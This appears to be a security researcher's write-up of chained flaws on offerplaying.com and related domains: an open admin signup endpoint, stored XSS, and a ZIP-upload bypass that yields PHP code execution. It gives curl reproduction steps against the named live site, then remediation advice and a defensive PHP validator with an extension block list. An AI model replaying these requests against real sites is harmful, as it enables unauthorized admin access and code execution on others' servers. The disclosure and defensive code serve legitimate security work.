Abstract
offerplaying.com has several chained vulnerabilities that allow an attacker to take almost full control of the machines that host that website, and with it the other sites served from the same hosts via nginx, such as inebook.cc, landing.ebooki.com, landing.radiuniverse.com, megaebook.cc, sub-megaebook.cc and thepolo.cc.
Summary of all vulnerabilities
- No authentication or authorization check on the https://offerplaying.com/api/user/signup API endpoint, which lets anyone create an admin account on the website.
- Stored XSS in all form/database fields, which lets an attacker inject JavaScript code into the pages that display those values.
- A filter blocks direct uploads of PHP files (which would otherwise be executed on the server), but it can be bypassed by placing the PHP file inside the ZIP template that has to be uploaded when creating an offer. The archive is extracted into a directory that is reachable over the web, so the uploaded PHP script can be requested remotely and can run arbitrary commands through exec(). This is remote code execution.
Steps to reproduce
- Perform the following request to sign up as an admin, substituting the placeholders in braces with the new account details: curl -d "u_email={email_address}&u_password={password}&u_name={name}&u_surname={surname}&u_password_confirm={password}&u_country=US&u_terms=1" https://offerplaying.com/api/user/signup
- In the sidebar, go to "Offers", "Add new offer". Upload the following ZIP file:
- Then, make the following request (the script parameter is the URL-encoded PHP code header("Content-Type: text/plain"); echo "Hello World";): curl -d "script=header(%22Content-Type%3A%20text%2Fplain%22)%3B%20echo%20%22Hello%20World%22%3B" "https://offerplaying.com/landings/0/doo2.php?POST=1"
- You should receive "Hello WorldOK" as the response, which shows that the submitted PHP code was executed on the server.
What should be done?
The signup API endpoint needs an authorization check so that it only creates a user when an authenticated admin is making the request; the role of the new account must not be decided by the client. All PHP scripts that process forms should reject or neutralize HTML in their input, and, more importantly, every page that renders a stored field should HTML-encode it on output, since input filtering alone is easy to miss on one field. Finally, the offer-creation script must inspect every entry of the uploaded ZIP before extracting anything and reject archives that contain server-executable files (.php and its variants such as .phtml and .phar, including double extensions like shell.php.jpg) or entries whose path escapes the extraction directory. As defence in depth, nginx should not pass requests under /landings/ to the PHP interpreter at all, so that a file which slips through the filter still cannot run.
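The following is an added example written for this report, not code from offerplaying.com, showing one way to close the three issues listed in the summary and in the recommendations above. It assumes PHP sessions in which $_SESSION['role'] is set to 'admin' on login, and the ZipArchive extension that ships with PHP; the function and constant names are illustrative.

```php
<?php
declare(strict_types=1);

// Added example, not the site's own code. Assumed: PHP sessions with
// $_SESSION['role'] === 'admin' after an admin login, and ext/zip (ZipArchive).

// 1. Signup endpoint: refuse to create accounts unless an admin is logged in.
function requireAdmin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (($_SESSION['role'] ?? null) !== 'admin') {
        http_response_code(403);
        exit('Forbidden');
    }
}

// 2. Stored XSS: whatever was saved, encode it when it is written into HTML.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 3. Offer templates: inspect every ZIP entry before extracting anything.
//    Executable server-side extensions are rejected anywhere in the file name
//    (so "shell.php.jpg" is caught too) and only static asset types are allowed.
const FORBIDDEN_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'php7', 'php8',
                              'phtml', 'phar', 'phps', 'pht', 'inc', 'cgi', 'pl', 'sh'];
const ALLOWED_EXTENSIONS   = ['html', 'htm', 'css', 'js', 'json', 'png', 'jpg', 'jpeg',
                              'gif', 'svg', 'webp', 'ico', 'woff', 'woff2', 'txt'];

function entryIsSafe(string $name, ?string &$reason = null): bool
{
    if ($name === '' || substr($name, -1) === '/') {
        return true; // directory entry, nothing to execute
    }
    if (strpos($name, "\0") !== false || strpos($name, '\\') !== false || $name[0] === '/') {
        $reason = "bad path: $name";
        return false;
    }
    foreach (explode('/', $name) as $segment) {
        if ($segment === '..') { $reason = "path traversal: $name"; return false; }
    }
    $base = strtolower(basename($name));
    if ($base[0] === '.') { $reason = "dotfile: $name"; return false; } // .htaccess, .user.ini
    $parts = explode('.', $base);
    if (count($parts) < 2) { $reason = "no extension: $name"; return false; }
    array_shift($parts); // drop the stem, keep every extension segment
    foreach ($parts as $ext) {
        if (in_array($ext, FORBIDDEN_EXTENSIONS, true)) { $reason = "executable extension: $name"; return false; }
    }
    if (!in_array(end($parts), ALLOWED_EXTENSIONS, true)) { $reason = "extension not allowed: $name"; return false; }
    return true;
}

function zipIsSafe(string $zipPath, array &$reasons = []): bool
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        $reasons[] = 'cannot open archive';
        return false;
    }
    $ok = true;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $reason = null;
        if (!entryIsSafe($zip->getNameIndex($i), $reason)) {
            $reasons[] = $reason;
            $ok = false;
        }
    }
    $zip->close();
    return $ok;
}

// Extract only after the whole archive passed; never extract first and filter later.
function extractTemplate(string $zipPath, string $destDir): void
{
    $reasons = [];
    if (!zipIsSafe($zipPath, $reasons)) {
        throw new RuntimeException('rejected template: ' . implode('; ', $reasons));
    }
    $zip = new ZipArchive();
    $zip->open($zipPath);
    $zip->extractTo($destDir);
    $zip->close();
}

// Constructed self-check: a temporary archive with a PHP file and a traversal
// entry (not a real offer template) must be rejected with both reasons listed.
$tmp = tempnam(sys_get_temp_dir(), 'tpl');
$zip = new ZipArchive();
$zip->open($tmp, ZipArchive::OVERWRITE);
$zip->addFromString('index.html', '<h1>offer</h1>');
$zip->addFromString('assets/style.css', 'body{}');
$zip->addFromString('assets/shell.php.jpg', '<?php phpinfo();');
$zip->addFromString('../escape.html', '');
$zip->close();
$reasons = [];
var_dump(zipIsSafe($tmp, $reasons));
print_r($reasons);
unlink($tmp);
```

The allowlist is deliberately short: an offer template only needs markup, styles, scripts, fonts and images, so anything else is rejected rather than trying to enumerate every extension the interpreter might pick up. The extraction step is kept separate from validation so that a rejected archive never touches the web-accessible directory, which is the property the current "filter after upload" approach lacks.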
Attack scenario
Anyone on the Internet with minimal knowledge of JavaScript and of how web servers work can exploit the first vulnerability in the list, and with a little knowledge of security and some patience can exploit the other two. Someone who wants the database, which may contain information valuable to them, can therefore follow the steps above and dump it, or execute arbitrary code on the machine hosting the website.
Final comments
This vulnerability is not exploitable right now because they have turned their website off (a 404 error appears on my screen), so I will not report the vulnerability for now.